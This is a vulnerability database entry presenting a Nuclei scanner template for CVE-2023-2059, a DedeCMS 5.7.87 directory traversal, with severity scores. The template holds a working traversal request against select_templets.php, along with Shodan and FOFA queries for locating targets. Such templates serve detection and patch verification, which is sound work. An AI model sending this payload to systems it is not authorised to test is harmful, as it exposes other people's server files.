Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-2059
HistoryMay 25, 2024 - 7:15 p.m.

DedeCMS 5.7.87 - Directory Traversal

2024-05-2519:15:57
ProjectDiscovery
github.com
13
dedecms
cve2023
directorytraversal
sensitivefiles

CVSS2

4

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:N/I:N/A:P

CVSS3

5.3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

AI Score

5.2

Confidence

High

EPSS

0.05

Percentile

93.0%

Directory traversal vulnerability in DedeCMS 5.7.87 allows reading sensitive files via the $activepath parameter.
id: CVE-2023-2059

info:
  name: DedeCMS 5.7.87 - Directory Traversal
  author: pussycat0x
  severity: medium
  description: |
    Directory traversal vulnerability in DedeCMS 5.7.87 allows reading sensitive files via the $activepath parameter.
  reference:
    - https://github.com/ATZXC-RedTeam/cve/blob/main/dedecms.md
    - https://vuldb.com/?ctiid.225944
    - https://vuldb.com/?id.225944
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2023-2059
    cwe-id: CWE-28
    epss-score: 0.0012
    epss-percentile: 0.46305
    cpe: cpe:2.3:a:dedecms:dedecms:5.7.87:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: dedecms
    product: dedecms
    shodan-query:
      - http.html:"dedecms"
      - cpe:"cpe:2.3:a:dedecms:dedecms"
    fofa-query:
      - app="DedeCMS"
      - app="dedecms"
      - body="dedecms"
  tags: cve,cve2023,dedecms,lfi

http:
  - raw:
      - |
        GET /include/dialog/select_templets.php?f=form1.templetactivepath=%2ftemplets/../..\..\..\ HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "dirname(__FILE__)"
          - "$cfg_basedir"
          - "dedecms"
        condition: and
        case-insensitive: true

      - type: status
        status:
          - 200
# digest: 490a0046304402201d0c6e100044fdde3998231bae6f6cbe3bec52a4aba56ad08ce532b7ed60d51602200d13686fedd840e2d62e31cc95af0a1deaf172631bd8b39d815cfe7e497a8a9c:922c64590222798bb761d5b6d8e72950

CVSS2

4

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:N/I:N/A:P

CVSS3

5.3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

AI Score

5.2

Confidence

High

EPSS

0.05

Percentile

93.0%

Related for NUCLEI:CVE-2023-2059